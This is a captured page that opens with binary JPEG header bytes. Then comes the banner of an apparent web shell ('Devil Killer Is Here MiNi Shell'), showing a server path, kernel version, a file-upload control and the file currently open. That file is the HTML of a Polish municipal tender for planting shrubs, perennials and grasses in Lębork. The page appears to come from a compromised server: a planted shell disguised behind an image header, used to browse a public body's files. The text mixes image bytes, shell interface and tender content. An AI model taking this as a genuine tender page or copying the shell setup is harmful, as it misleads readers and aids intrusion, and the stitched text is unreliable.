JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240813/0045525701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa, nasadzenia i pielęgnacja krzewów, bylin i traw dla zadania „Więcej drzew i krzewów w mieście – Zielony Lębork” - II etap. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Lębork</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979737</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Armii Krajowej 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lębork</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">598624280</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">inwestycje@um.lebork.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.lebork.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa, nasadzenia i pielęgnacja krzewów, bylin i traw dla zadania „Więcej drzew i krzewów w mieście – Zielony Lębork” - II etap. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ffe0fe5f-6cef-429b-b9d9-1f8cd50e4f85</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00455257</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00016169/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa, nasadzenia i pielęgnacja krzewów, bylin i traw dla zadania „ Więcej drzew i krzewów w mieście – Zielony Lębork”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.lebork.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://umlebork.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Porozumiewanie się Zamawiającego z Wykonawcami odbywa się drogą elektroniczną przy użyciu Platformy Zakupowej Urzędu Miasta Lębork https://umlebork.ezamawiajacy.pl/servlet/HomeServlet . Istnieje możliwość kierowania zapytania za pomocą środków komunikacji elektronicznej – e-mail: inwestycje@um.lebork.pl – z zastrzeżeniem wymogów odnośnie poszczególnych oświadczeń i dokumentów określonych w niniejszej SWZ.2.Zaleca się aby Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, posiadał konto na Platformie Zakupowej Urzędu Miasta Lębork.3.Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Instrukcji dla Wykonawcy dostępnej pod adresem: https://umlebork.ezamawiajacy.pl/servlet/HomeServlet?MP_module=main&amp;MP_action=publicFilesList&amp;clientName=UMLEBORK&amp;USER_MENU_HOVER=publicFilesList4.Za datę przekazania oferty, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na Platformę Zakupową. 5. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email:inwestycje@um.lebork.pl.6. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem Platformy Zakupowej jako załączniki. Sposób sporządzania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452). 7.Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ. 8. Uprawnionym przez Zamawiającego do kontaktów z Wykonawcami jest mgr inż. Romuald Babul – Naczelnik Wydziału Realizacji Inwestycji w siedzibie Zamawiającego, tel. 59 86-37-753, tel. kom. 608 584 785.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych ) (Dz. Urz. UE<br/>L 119 z 04.05.2016 r., str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1.1.administratorem danych osobowych jest Urząd Miejski w Lęborku, ul. Armii Krajowej 14, 84 300 Lębork, tel. 59 8624 280;<br/>1.2.inspektorem ochrony danych osobowych w Urzędzie Miejskim w Lęborku jest pani Bożena Steciuk, e-mail: iod@um.lebork.pl, tel.<br/>59 8637 733;<br/>1.3.dane osobowe przekazane przez Wykonawcę przetwarzane będą na podstawie art. 6 ust. 1 lit c RODO w celu związanym z<br/>niniejszym postępowaniem o udzielenie zamówienia publicznego na Wykonanie dokumentacji projektowo-kosztorysowej rozbudowy<br/>Stadionu Miejskiego w Lęborku, prowadzonym w trybie podstawowym bez przeprowadzenia negocjacji na podst.art.275 pkt.1.<br/>1.4.odbiorcami danych osobowych przekazanych przez Wykonawcę będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych<br/>(Dz. U. z 2018 r. poz. 1986, 2215, z 2019 r. poz. 53.), dalej Ustawa Pzp;<br/>1.5.dane osobowe przekazane przez Wykonawcę będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 5 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia;1.6.obowiązek podania przez Wykonawcę danych osobowych bezpośrednio dotyczących Wykonawcy jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego, konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>1.7.w odniesieniu do danych osobowych przekazanych przez Wykonawcę decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO;<br/>Zamówienie udzielane jest w trybie podstawowym na<br/>podstawie: art. 275 pkt 1 ustawy - Usługi<br/>1.8.Wykonawca posiada:<br/>1.8.1.na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>1.8.2.na podstawie art. 16 RODO prawo do sprostowania danych osobowych Wykonawcy;<br/>1.8.3.na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>1.8.4.prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie danych<br/>osobowych dotyczących Wykonawcy narusza przepisy RODO;<br/>1.9.Wykonawcy nie przysługuje:<br/>1.9.1.w związku z art. 17 ust. 3 lit. b d lub e RODO prawo do usunięcia danych osobowych;<br/>1.9.2.prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.Z.14.2024.W</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 225000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa, nasadzenie własnego materiału i pielęgnacja krzewów, bylin i traw na terenie Lęborka dla zadania „Więcej drzew i krzewów w mieście – Zielony Lębork” na terenie obszarów i kwater wskazanych w Załączniku nr 11 do SWZ.<br/>1.1.	Dostawa, nasadzenie i pielęgnacja krzewów, bylin i traw dla obszaru – A - ul. Olimpijczyków od strony ul. Kusocińskiego, H - Mini Park, T – Park Michalskiego, T2 – Park Michalskiego – II etap. Szczegółowy opis, w tym wymagany gatunek oraz wymagana ilość krzewów, bylin i traw zawarte są w Załączniku nr 9 do SWZ. Wykaz roślin dotyczących realizacji zamówienia:<br/><br/> <br/>T – PARK MICHALSKIEGO I ETAP 1411 szt. roślin ogółem<br/>A - UL. OLIMPIJCZYKÓW OD STR. UL. KUSOCIŃSKIEGO	1410 szt. roślin ogółem<br/>H - MINI PARK 1533 szt. roślin ogółem<br/>T2 PARKI MICHALSKIEGO II 2883 szt. roślin ogółem<br/><br/>krzew, bylina, trawa	szt.<br/>bluszcz	878<br/>hosta	225<br/>tawuła japońska	135<br/>azalia	31<br/>pieris japoński	4<br/>kalmia	7<br/>wrzos	51<br/>jałowiec płożący	58<br/>róża okrywowa	101<br/>jałowiec pośredni	6<br/>lawenda	41<br/>pięciornik	92<br/>bodziszek	790<br/>trzmielina	134<br/>różanecznik	29<br/>hortensja	541<br/>dereń biały	3<br/>pęcherznica kalinolistna	3<br/>liliowiec	50<br/>azalia japońska	13<br/>kostrzewa	125<br/>suchodrzew	60<br/>krzewuszka	528<br/>żurawka	382<br/>forsycja	16<br/>berberys niski	5<br/>bergenia	47<br/>runianka	27<br/>berberys 225<br/>perukowiec	1<br/>pigwowiec	13<br/>miskant	258<br/>bukszpan	8<br/>dziurawiec	12<br/>żylistek	3<br/>tawułka	25<br/>pęcherznica	24<br/>jeżówka	203<br/>rudbekia	17<br/>dereń	32<br/>dąbrówka rozgłowa	27<br/>tawuła	141<br/>świerk	3<br/>jałowiec	1008<br/>irga	116<br/>lilak	20<br/>róża	124<br/>aster	64<br/>turzyca	118<br/>chaber	56<br/>cyprysik	30<br/>sosna	8<br/>robinia	1<br/>buk (żywopłot)	300<br/>trzcinnik	18<br/> Razem:	7237<br/><br/>2.	Wymagania Zamawiającego:<br/>2.1.	Materiał roślinny ma zostać dostarczony w donicach:<br/>2.1.1.	Krzewy ozdobne (liściaste i iglaste) – doniczka o pojemności 5 dm3 C5<br/>2.1.2.	Trawy i byliny wieloletnie – doniczka o pojemności 3 dm3 C3<br/>2.1.3.	Buk pospolity (żywopłot) – doniczka o pojemności min. 1 dm3<br/>2.2.	Wykonawcy zostanie przekazany teren poszczególnych obszarów, na których należy wykonać pełne wypielenia wszystkich kwater/ skupin krzewów (porost występujących na rabatach chwastów obejmować będzie maksymalny okres wegetacji do 30 dni przed przekazaniem skweru Wykonawcy).<br/>2.3.	Po dokonaniu pielenia poszczególnych kwater i odbiorze przez inspektora nadzoru. Wykonawca przystępuje do nasadzeń ubytków krzewów i bylin. Nasadzenia obejmują całkowitą zaprawę dołów kompostem organicznym w tej samej ilości co pojemność doniczki sadzonki. Po zakończeniu sadzenia i podlaniu Wykonawca zobowiązany jest do obsypania na rabacie każdej sadzonki kora iglastą (kompost organiczny i kora iglasta do pobrania przez Wykonawcę z bazy Referatu Zieleni Miejskiej przy ul. Warszawskiej 15 A).<br/>2.4.	Wykonawca zobowiązany jest do podlewania wykonanych nasadzeń do czasu odbioru nasadzonych roślin, tj. do dnia 22.10.2024 r. w ilości min. 2 x w ciągu tygodnia. Ponadto w okresie od 23.10.2024 do 30.11.2024 Wykonawca w ramach zawartej umowy zobowiązany będzie do właściwej pielęgnacji nasadzonych roślin wraz z ich podlewaniem. Wykonawcy będzie umożliwiony bezpłatny pobór wody z szafek hydrantowych zainstalowanych na sieci wodociągowej na poszczególnych skwerach, w których pobór wody będzie prowadzony pompą ze zbiorników wodnych.<br/>2.5.	Zamawiający wymaga do realizacji zamówienia użycie sadzonek krzewów ozdobnych oraz bylin i traw wieloletnich w donicach. Wielkości donic określone zostały w niniejszym Dziale ust. 2 SWZ<br/>Materiał szkółkarski roślin musi być czysty odmianowo i wyprodukowany zgodnie z zasadami agrotechniki szkółkarskiej. Wymagamy roślin zdrowych, zdrewniałych, zahartowanych oraz prawidłowo uformowanych, z zachowaniem charakterystycznego dla gatunku i odmiany pokroju, wysokości, szerokości i długości pędów, a także równomiernego rozkrzewienia i rozgałęzienia. Materiał musi być zdrowy, bez uszkodzeń mechanicznych, objawów będących skutkiem niewłaściwego nawożenia i agrotechniki. System korzeniowy musi być dobrze wykształcony, nieuszkodzony, odpowiedni dla danego gatunku, odmiany i wieku rośliny. Rośliny muszą posiadać cechy charakterystyczne dla gatunku i odmiany oraz spełniać wymagania dotyczące wielkości i być w dobrym stanie. Rośliny muszą posiadać paszporty pochodzenia oznaczone etykietą zawierającą pełną nazwę rośliny, w tym nazwę łacińską (w przypadku dostawy jednorodnej wystarczy zaopatrzyć w etykietę jedną roślinę danego gatunku/odmiany). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03110000-5 - Rośliny uprawne, produkty warzywnictwa i ogrodnictwa</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-10-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający przy wyborze najkorzystniejszej oferty posługiwać się będzie następującymi kryteriami:<br/><br/>a. Cena oferty (C) - waga kryterium 60%. <br/>Przyjmuje się, że oferta z najniższą ceną otrzyma 60 pkt.<br/><br/> cena najniższa<br/> C = --------------------------------- x 60 pkt.<br/> cena danego Wykonawcy<br/><br/>b. Kryterium „Okres gwarancji” – długość okresu gwarancji (nie mniej niż 12 miesięcy, nie więcej niż 24 miesiące) – 40%. <br/><br/>Jeżeli Wykonawca wskaże w ofercie okres gwarancji powyżej 24 miesięcy Zamawiający przyjmie do obliczeń wartość 24 miesięcy; <br/><br/>Oferty są punktowane liniowo wedle następującej formuły arytmetycznej: <br/><br/> (Xi –12) <br/>G = ilość punktów = ------------------------* 40 pkt. <br/> (24 - 12) <br/><br/>gdzie: <br/>Xi - ilość pełnych miesięcy okresu gwarancji ocenianej oferty (nie mniej niż obowiązkowe 12 miesięcy i nie więcej niż maksymalna ilość 24 miesiące). <br/>UWAGA: <br/>Czas trwania okresu gwarancji należy określić w pełnych miesiącach, liczony od miesiąca następnego, w którym nastąpił odbiór końcowy przedmiotu zamówienia<br/> <br/>2. Łączna punktacja oferty = suma punktów (C + G)<br/><br/>gdzie:<br/>C – liczba punktów jaką może zdobyć oferta (Wykonawca) za kryterium „Cena”<br/>G – liczba punktów jaką może zdobyć oferta (Wykonawca) w kryterium „Okres gwarancji”<br/><br/>Maksymalna liczba punktów: 100<br/><br/>3. Oferta, która uzyska najwyższą łączną punktację, uważana jest za ofertę najkorzystniejszą.<br/>4. Zamawiający udzieli niniejszego Zamówienia temu Wykonawcy, który uzyska najwyższą liczbę punktów zgodnie z powyższym wzorem. Maksymalna ilość punktów, jaką może zdobyć Wykonawca uwzględniając wszystkie kryteria oceny ofert wynosi 100 pkt. Za najwyżej ocenioną zostanie uznana oferta, która otrzyma najwyższą liczbę punktów. W przypadku równej ilości punktów za najkorzystniejszą ofertę zostanie uznana oferta z najniższą ceną.<br/>5. Brak wypełnienia przez Wykonawcę w formularzu oferty ceny lub innego kryterium oceny ofert spowoduje odrzucenie oferty, jako niezgodnej z treścią SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Zdolność techniczna lub zawodowa.<br/>1.1.	Wykonawca wykaże, że w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną usługę związaną z nasadzeniem sadzonek roślin o łącznej wartości prac min. 80 tys. zł w ramach 1 umowy wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy/ usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów – oświadczenie wykonawcy <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie<br/>Wykonawcy/Podmiotu udostępniającego zasoby w zakresie podstaw wykluczenia z postepowania na podstawie art. 7 ust. 1 UOBN –<br/>Załącznik nr 6 do SWZ.<br/>2.Oświadczenie Wykonawcy dotyczące przynależności do grupy kapitałowej– zgodnie z Załącznikiem nr 4 do SWZ.<br/>Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do<br/>zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.<br/>W przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia każdy z Wykonawców składa osobno w/w<br/>oświadczenie.<br/>3.Oświadczenie Wykonawcy/Podmiotu udostępniającego zasoby w zakresie podstaw wykluczenia z postępowania – Załącznik nr 5 do SWZ.<br/>5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: 1.Wykaz usług wykonanych w okresie ostatnich 3 lat a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane, z załączeniem dowodów<br/>określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie<br/>jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy 